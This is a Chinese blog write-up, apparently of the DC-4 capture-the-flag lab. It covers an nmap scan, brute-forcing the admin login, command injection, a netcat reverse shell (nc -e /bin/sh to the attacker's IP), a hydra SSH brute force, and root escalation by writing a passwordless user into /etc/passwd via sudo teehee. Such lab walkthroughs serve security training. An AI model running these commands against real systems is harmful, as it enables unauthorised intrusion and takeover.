• 5.DC4


    DC-4

    关于环境的搭建 , 大家可以自行百度

    网络桥接

    渗透机 kali

    靶机 dc-4

    0x01. 信息收集

    老规矩就是那一套 , 然后找到靶机的真实ip , 扫描一下全端口

    nmap 192.168.0.151
    

    image-20210619155607796

    可以看到只开放了 80 和 22端口 , 访问一下80端口

    image-20210619155759547

    是一个admin登录页面 , 可以看到是没有验证码的 , 尝试暴力破解 , 拿出我的大字典 , 最终爆出来是

    admin    happy
    

    0x02. 漏洞发现和利用

    1. 获取shell

    然后登录进入会发现有一个命令执行的漏洞

    image-20210619160900753

    抓包 , 改包 , 尝试修改参数 , 发现果然有命令执行漏洞

    一般linux(nmap扫一下)上都有nc , 我们通过nc反弹一个shell

    nc -e /bin/sh 192.168.0.110 4445
    

    image-20210619161245495

    image-20210619161125655

    然后通过python进入交互式shell

    python -c "import pty;pty.spawn('/bin/bash')"
    

    image-20210619161524675

    通过查看/etc/passwd文件 , 发现有

    image-20210619162537602

    既然有三个用户 , 那么就分别进去看看家目录下有什么 , 一般靶机的hint都喜欢在家目录下 , 最后在jim的家目录

    下发现了 backups

    image-20210619162744505

    然后在里面发现了以前的老密码

    image-20210619163036376

    然后使用hydra尝试对那三个用户爆破

    hydra -L user.dic -P passwd.txt -vV -f 192.168.0.151 ssh
    

    爆出一个账号的密码

    jim
    jibril04
    

    然后ssh连接 , 在登录信息后有一个mail

    image-20210619164437382

    find / -name "mail"    找寻名字叫mail的 , 搜索的结果是/var/mail
    

    image-20210619164626638

    在里面发现了charles给他发的邮件 , 里面有他的密码 , 切换用户charles

    2. 提权

    sudo -l

    image-20210619164854646

    发现了一个teehee命令 , 这个命令可以往一个文件追加内容 , 可以通过他向/etc/passwd写入文件

    echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
    
    #如:admin:x:0:0::/home/admin:/bin/bash #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
    

    切换test用户 , 拿到最后的flag

    image-20210619165204828

    0x03. 总结

    1. fuzzing测试2.nc 反弹shell3. 交互式shell4. 提权
    
  • 相关阅读:
    【技术贴】解决Eclipse编译java源文件之后没有生成class文件|找不到class文件
    小米1s 正式为我服役,纪念一下。
    解决servlet的out输出流html中文乱码
    小米1s充电时屏幕一直亮着不关闭的解决办法
    今天遇到的问题分析
    java操作Excel(org.apache.poi.hssf.usermodel)
    HTML滚动文字代码 marquee标签
    MIUI小米 卸载金山安全服务
    Oracle DBA 逻辑备份试题
    Oracle DBA结构试题1
  • 原文地址:https://www.cnblogs.com/xcymn/p/15712497.html
Copyright © 2020-2023  润新知